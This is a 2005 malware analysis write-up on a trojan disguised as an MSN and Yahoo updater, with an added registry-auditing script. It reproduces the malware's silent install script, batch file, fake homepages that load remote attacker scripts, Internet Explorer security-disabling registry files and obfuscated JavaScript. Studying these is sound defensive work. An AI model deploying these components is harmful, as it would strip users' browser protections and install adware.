This malware analysis document discusses a piece of malware that disguises itself as an MSN and Yahoo updater. It unpacks itself using UPX and WinRAR, then modifies the registry and loads HTML files to redirect the user to malicious sites and install adware. The malware aims to circumvent security settings and install additional software onto the system.
Malware Analysis
Randy Armknecht – http://www.rarmknecht.com
October 2005
1. What is a .cmd extension? On which systems would this file extension work?
It’s an executable extension for files that will be run by the cmd.exe interpreter on Windows NT and later machines. CMD files do NOT start with the bytes 0x4D5A like Win32/PE .exe files do. Typically, and as is the case with this malware, the .cmd file is an ASCII file that is run as a script by the interpreter.
2. Did you check the MD5 of the unzipped binary? Does it match?
I did and it matches as seen below:
C:MalwareGroundZeropbuenoquiz3>md5 BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629d
E50E87AD5D34CF8D16D01447821D629D BoOtIoS2.exe-e50e87ad5d34cf8d16d01447821d629d
pbueno's: e50e87ad5d34cf8d16d01447821d629d
mine:     E50E87AD5D34CF8D16D01447821D629D
3. Is it packed? If yes, which packer was used?
I ran the strings command and believe that the output below shows it to be packed with UPX and to be a WinRAR self-extracting executable.
Strings v2.2
Copyright (C) 1999-2005 Mark Russinovich
Sysinternals - www.sysinternals.com
ASKNEXT
VOL
RD1
xt
ASKNEXTVOL
GETPASSWORD1
LICENSEDLG
RENAMEDLG
REPLACEFILEDLG
STARTDLG
DVCLAL
ccpp
MZP
This program must be run under Win32
UPX0
UPX1
.rsrc
1.20
UPX!
SVW
…
name="Roshal.WinRAR.WinRAR"
4. What is this piece of malware claiming to be?
By reading the SFX Comments section we can see that the malware is claiming to be an updater for MSN and Yahoo. Inside is a .cmd file.
;The comment below contains SFX script commands
Path=.%systemroot%
SavePath
Setup=msnupdater.cmd
Silent=1
Overwrite=1
Title=Msn & Yahoo Updater
Text
{
Updater for Msn and Yahoo Home pages
}
License=Home Page Setup Updater
{
Msn and Yahoo Page updater
}
5. Please describe the process by which this malware will try to get installed on the system.
From the SFX section it looks like the malware will copy msnupdater.cmd to %SYSTEMROOT%. The Silent flag is set, so it will not display any graphical notification to the user that this happened. Also, the Overwrite flag is set, so if the file already exists it will be overwritten; a possible way for the malware to update older versions of itself? After the file has been copied it will be executed.
Thanks to FileMon we can see the cmd file being copied here:
After that file is created it creates yahoohomepage.html
Then it creates what looks to be a registry file, 2377.reg
After 2377.reg it creates 5577.reg and msnhomepage.html
Now that all the files it needs to do its evil bidding are in place, it uses cmd.exe to execute both msnupdater.cmd and regedit.exe
Regedit then loads the two previously copied .reg files and imports them
After that it opens Internet Explorer and loads msnhomepage.html
After closing that IE window it then relaunches IE and displays the yahoohomepage.html file
What it displays is shown below
After closing the Yahoo IE window the .cmd file finishes up and closes
6. After some investigation on a machine that had this malware installed, it was verified that the machine was trying to access something related to "*msn*" and "*yahoo*"... Does this malware have something to do with it? If so, with which purpose? :-)
I would say absolutely. Especially if the something it was trying to access was msnhomepage.html or yahoohomepage.html. Let’s take a look at those files, shall we?
msnhomepage.html
<html>
<title> Welcome to Msn.com </title>
<meta http-equiv="refresh" content="20;url=http://www.razor-radio.us">
<body>
Standby Loading Msn.com .......
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://static.windupdates.com/prompts/a372a171/a770ab73.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</body>
</html>
We can see that the only purpose of this page is to first load a JavaScript file from static.windupdates.com. After 20 seconds it refreshes the page to display www.razor-radio.us.
The machine that the malware executed on doesn’t have an internet connection, so I grabbed the a770ab73.js file using curl on a *nix box. We’ll take a more detailed look at the JavaScript and the website later.
yahoohomepage.html
<html>
<title> Welcome to Yahoo.com </title>
<meta http-equiv="refresh" content="115;url=http://www.yahoo.com">
<body>
Standby Loading Yahoo.com ...........................................
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://static.windupdates.com/prompts/a376ab73/a776a174.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
<!-- AUTO_PROMPT AD START -->
<script language='JavaScript' type='text/JavaScript'
src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=0&delayload=10&account_id=159080&recurrence=always&adid=a1111819823&event_type=onload&signature=adult'></script>
<!-- AUTO_PROMPT AD END -->
</body>
</html>
We can see here that this grabs two JavaScript files, one from static.windupdates.com like the msnhomepage.html file and another one from install.xxxtoolbar.com. These files were also grabbed using curl on a *nix box. One improvement over the msnhomepage.html file is that after 115 seconds it reloads the page with yahoo.com. Hey, at least this time it attempts to look legit :)
7. On the same machine, it was observed that some registry entries were messed up... Again, does this malware have something to do with it? If so, why?
Absolutely. As mentioned in my response to question 5, two .reg files are copied into the %SYSTEMROOT% directory and then imported with regedit. We can also verify this by looking at the source of msnupdater.cmd, seen below:
@echo off
echo Updating Windows Shell Files
REGEDIT.EXE /S 2377.reg
REGEDIT.EXE /S 5577.reg
echo Updating Windows Shell Files.....
msnhomepage.html
echo Updating Windows Shell Files........
yahoohomepage.html
echo Updating Windows Shell Files...........
echo Updating Windows Shell Files..............
echo Updating Windows Shell Files is now Complete.
exit
Let’s take a look at what these registry files do…
2377.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1004"=dword:00000000
"1201"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1004"=dword:00000000
"1201"=dword:00000000
"1406"=dword:00000000
"1A04"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1004"=dword:00000000
"1201"=dword:00000000
"1001"=dword:00000000
"1200"=dword:00000000
"1400"=dword:00000000
"1606"=dword:00000000
"1607"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults]
"http"=dword:00000000
We can see that it modifies several of the Internet Zone settings in IE. Using http://support.microsoft.com/?kbid=182569 we can see that this registry file does the following (a dword value of 0 means the action is Enabled, i.e. allowed without any prompt):
Value Setting
-----------------------------------------------------------------------
1001  Download signed ActiveX controls
1004  Download unsigned ActiveX controls
1200  Run ActiveX controls and plug-ins
1201  Initialize and script ActiveX controls not marked as safe
1400  Active scripting
1406  Access data sources across domains
1606  Userdata persistence
1607  Navigate sub-frames across different domains
1A04  Don't prompt for client certificate selection when no certificates or only one certificate exists *
The last entry in that file specifies that any website using http as its protocol should be treated as zone 0, the local machine zone. Obviously, a very bad thing.
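As an added example (not part of the original analysis), the small JavaScript auditor below parses a regedit export in the format of 2377.reg and reports which zone actions it switches to Enabled and which protocol it remaps to zone 0, using the KB 182569 action IDs from the table above. The sample input is constructed from the 2377.reg entries shown above.

```javascript
// Auditor for regedit export files, written to flag the IE zone changes that
// 2377.reg makes. Action IDs and meanings are those from Microsoft KB 182569
// quoted above; a dword of 0 means the action is Enabled (allowed without a prompt).
const ZONE_ACTIONS = {
  "1001": "Download signed ActiveX controls",
  "1004": "Download unsigned ActiveX controls",
  "1200": "Run ActiveX controls and plug-ins",
  "1201": "Initialize and script ActiveX controls not marked as safe",
  "1400": "Active scripting",
  "1406": "Access data sources across domains",
  "1606": "Userdata persistence",
  "1607": "Navigate sub-frames across different domains",
  "1A04": "Don't prompt for client certificate selection",
};
const ZONE_NAMES = { "0": "My Computer", "1": "Local intranet", "2": "Trusted sites", "3": "Internet", "4": "Restricted sites" };
// Parses the "[key]" section headers and "name"=dword:xxxxxxxx lines of a .reg file.
function parseRegFile(text) {
  const entries = [];
  let key = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    const sec = line.match(/^\[(.+)\]$/);
    if (sec) { key = sec[1]; continue; }
    const val = line.match(/^"([^"]+)"=dword:([0-9a-fA-F]{8})$/);
    if (val && key) entries.push({ key, name: val[1], value: parseInt(val[2], 16) });
  }
  return entries;
}
// Reports zone actions switched to Enabled and any protocol remapped to zone 0,
// which makes every http:// page run with My Computer (local machine) trust.
function auditIeZoneChanges(regText) {
  const findings = [];
  for (const e of parseRegFile(regText)) {
    const zone = e.key.match(/\\Internet Settings\\Zones\\(\d)$/);
    if (zone && e.value === 0 && ZONE_ACTIONS[e.name]) {
      findings.push(`${ZONE_NAMES[zone[1]]} zone: "${ZONE_ACTIONS[e.name]}" set to Enabled`);
    } else if (/\\ZoneMap\\ProtocolDefaults$/.test(e.key) && e.value === 0) {
      findings.push(`Protocol ${e.name} mapped to zone 0 (My Computer)`);
    }
  }
  return findings;
}
// Constructed sample: the Restricted sites block and ProtocolDefaults line from 2377.reg.
const SAMPLE_REG = `Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4]
"1004"=dword:00000000
"1400"=dword:00000000
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults]
"http"=dword:00000000`;
```

Running auditIeZoneChanges(SAMPLE_REG) lists each weakened action by zone name and the http-to-zone-0 remap, which is the same picture the table above gives for the full file.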
5577.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SYSTRAY"="C:\\UNMT.EXE"
This entry sets the machine to run the program UNMT.EXE each time a user logs on, under the value name SYSTRAY. What I find odd is that this file does not exist. Maybe that file is downloaded by the JavaScript, which we’re just about to get to.
8. Please describe how this malware tries to install software (and which software) on the machine...
The initial install creates the two HTML files, two .reg files, and the msnupdater.cmd file. The cmd file runs by first updating the registry settings of IE and adding a program to run at user login. Next the web pages are loaded. We’ve examined the cmd file and .reg files previously, along with the base code of the HTML files. Now we’ll take a look at the JavaScript files that the web pages run.
From the first web page we saw that it executes a770ab73.js. The file looks like this:
/*T5gRxPmT LQ8N19 Yo Hs4K*/var _aT8;var _20S;var _xEN=document;var _hL4;var _hCK;var _fRO;var
_nMp=String;var _x5H;var _EzP;var _gQU;var _YJN;var _qR2;var _5xj=_nMp.prototype;var _dNK;var
_EoB;var _jHO;var _ehN;var _e6q;var _7w1;var _9o5;var _Z6h;var _zP2;var _pG0;var
_ODd;_5xj._hCK=_5xj.slice;/*V1ZBI3sc wSZFB7zhkjk HEo bS 5yiz8 _P0nRO Mcl5_9ea*/function _Z6h
(_XjQ){_xEN.write("Axhw".slice(5)+"lsw#odqjxdjh@*MdydVfulsw*#w|sh@*wh{w2mdydvfulsw*#vuf@*".slice
(3)+_rCz+_XjQ+".EC6zj".slice(7)+"ulswA".slice(3));}function _g8A(_XDG,_hCK){if(_hCK){return
this._hCK(_XDG,_hCK);}var _L1b;var _T0g;var _RDA='';for(_L1b=0; _L1b<this.length; _L1b++)
{_T0g=this.charCodeAt(_L1b)-_XDG;if(_T0g<32){_T0g=127-(32-_T0g);}_RDA+=_nMp.fromCharCode(_T0g);}
return _RDA;};
_5xj.slice=_g8A;_dNK="569ddbcd2297775:53b7cb36g1c9588c473d9bg:9fec43gefcd84:d8cb5498b7e63bb427dg8
287edgb61;444:77764:4947484374727444724:76494276434:7572767448414847774274".slice(1);
_fRO=1;_7w1="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4}un4nsxyfqq3}un".slice(5);
_YJN=0;_EoB=""m{".slice(8);_ODd="q}}yC88|}j}rl7!rwm~ymj}n|7lxv8y{xvy}|8|y;8|}ny|h ;7|!o".slice
(9);_e6q=3;var _821="iuuq;00qvcmjd/xjoevqebuft/dpn0mphhjoh3/qiq".slice(1);var _WAH="nzzv@55v
{hroi4}otj{vjgzky4ius5vuve{tjkx4vnv".slice(6);_x5H="Dmjdl!ZFT!up!dpoujovf".slice(1);
_ehN="myyu?44xyfynh3|nsizuifyjx3htr4hfg4RjinfFhhjxx4of{f4gwnilj3ofw".slice(5);_9o5="tuzoikZk~zC_u
{1s{yz1lurru}1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,xkzx SymC_u{1s{yz1lurru}
1yzkvy17+8I181gtj191zu1giikyy1znk1su|oky,yozkTgskCLxkk1Su|ok1Giikyyeeeee1Iroiq1_KY131Ol1 u
{1gmx444,yozkV{hroynkxCSkjog1Giikyy,znkskC}
nozk,grvngC6,rumuVgznC,rumuYo!kCrgxmk,iruykHztCzk~z".slice(6);_gQU="o{{wA66z{h{pj5~puk|wkh
{lz5jvt6jhi6TlkphHjjlzz6pl6iypknl4j@5jhi".slice(7);_zP2="rqordg".slice(3);
_jHO="Dmjdl!ZFT!up!dpoujovf".slice(1);_hL4=1;var
_rCz="jvvr<11uvcvke0ykpfwrfcvgu0eqo1rtqorvu1lu1".slice(2);
_qR2=1;_20S=0;_pG0=0;_p_sf=_9o5;_p_ry=_e6q;_p_lu=_821;_p_xu=_7w1;_p_cl=_aT8;_p_cd=_20S;_p_sm=_ODd
;_p_ws=_Z6h;_p_pu=_EoB;_p_pr=_dNK;_p_cr=_hL4;_p_dl=_YJN;_p_ju=_ehN;_p_cm=_x5H;_p_ct=_fRO;_p_rm=_j
HO;_p_cp=_EzP;_p_pl=_WAH;_p_lf=_qR2;_p_cu=_gQU;_Z6h("joju/kt".slice(1));/*uy J 8s9-o
YlQRYYmYjWczG*/
Sure looks nasty, but I wrote a quick little HTML page that outputs the result of the file to a textarea on a web page. From that we can see that all it really does is write the following to the document object.
From the size of it, we can see that this is most likely what’s going to do the majority of the work. I put it through my decryptor and… well, what do you know, it stalls out when trying to grab the user agent. Because the script never finishes I wasn’t able to make it decode itself. Could it be because the box is fully patched up through October? Guess I’ll find out when other people post their answers.
9. If you could give only one piece of advice to your users, based on what you observed about this malware, what would you say?
Always be careful when going to websites. The JavaScript files are downloaded from windupdates.com, and the malware tries to pretend to be Yahoo! and MSN even though it doesn’t do a good job of it. Modern phishing emails are more convincing.
10. Do you think that our affected user was lying to the IR Team?
I do not think the user was lying. One of the main websites that feeds this malware is windupdates.com. An uninformed or simple user might think that it’s just short for Windows Updates and not know that they should only update their computer by clicking Start->Programs->Windows Update, which should take them to http://windowsupdate.microsoft.com
11. Finally(!!), how would you classify this malware?
I’m not familiar with the various categories the malware could be categorized in. But I might consider it a Trojan since it claims to do one thing but does another, and maybe a downloader since it goes out to the windupdates.com website to grab its JavaScript files. The remote files can be updated to provide new, improved functionality while the infecting executable itself won’t need to be updated.